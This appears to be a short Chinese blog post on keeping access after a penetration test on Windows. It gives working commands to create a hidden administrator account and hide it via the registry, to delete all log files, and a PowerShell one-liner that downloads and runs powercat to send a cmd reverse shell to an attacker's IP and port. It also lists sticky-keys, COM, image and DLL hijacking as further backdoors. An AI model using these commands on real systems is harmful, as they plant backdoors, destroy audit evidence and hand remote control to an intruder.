zoukankan      html  css  js  c++  java
  • 渗透测试之权限维持的方法

    权限维持的方法

    基本上现在常见的方法有以下几种:

    1、隐藏、克隆账户

    windows 隐藏账户

    net localgroup “Domain Admin” test$ /add

    net user test$ test /add
    net localgroup Administrators test$ /add
    net localgroup "Remote Desktop Users" test$ /add
    reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinLogonSpecialAccountsUserList" /v test$ /T REG_DWORD /D 0
    net user test$ /del
    del %WINDIR%*.log /a/s/q/f 删除所有日志文件
    2、shift后门
    3、启动项、计划任务
    C:UsersAdministratorAppDataRoamingMicrosoftWindowsStart MenuProgramsstartup

    4、劫持技术
    com劫持
    映像劫持 : 改注册表,debugger
    dll劫持,clr
    5、Powershell后门
    powershell IEX (New-Object

    System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip地址 -p 端口 -e cmd

    详细步骤链接:https://www.cnblogs.com/xiaozi/p/7613288.html

  • 相关阅读:
    密码等级
    ie兼容透明
    分割线
    支付宝银行判断接口
    date只能选择今天之后的时间js
    离开页面之前提示,关闭,刷新等
    使用 Linux 系统的常用命令
    C#窗体简单增删改查
    1
    二维数组
  • 原文地址:https://www.cnblogs.com/mutudou/p/11835756.html
Copyright © 2011-2022 走看看